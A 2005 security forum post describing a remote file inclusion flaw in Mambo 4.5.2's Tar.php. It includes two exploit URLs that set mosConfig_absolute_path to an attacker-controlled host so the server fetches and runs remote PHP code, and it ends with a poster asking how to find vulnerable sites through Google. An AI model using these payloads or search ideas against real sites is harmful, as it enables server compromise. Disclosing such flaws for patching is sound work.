 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 57
 Members: 0
 Total: 57
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Mambo Include File Error Execute Arbitrary Commands |
|
 Posted: Tue Feb 22, 2005 2:09 pm |
 |
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
 |
|
 |
|
Note : Version: 4.5.2 only is vulnerable
The '/includes/Archive/Tar.php' script includes the '/includes/PEAR/PEAR.php' script relative to the 'mosConfig_absolute_path' global variable. If the target site's PHP configuration file has register_globals set to 'on', then a remote user can supply a specially crafted URL to include and execute arbitrary PHP code on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.
| Code: | http://[target]/mambo/includes/archive/Tar.php?GLOBALS[mosConf ig_absolute_path]=http://[attacker]/
http://[target]/mambo/includes/archive/Tar.php?mosConfig_absolute_path=http://[attacker]/ |
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system. The commands will run with the privileges of the target web service.
not is easy search results in google for thi hole one idea ?  |
|
|
|
|
|
www.waraxe.us Forum Index -> XOOPS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
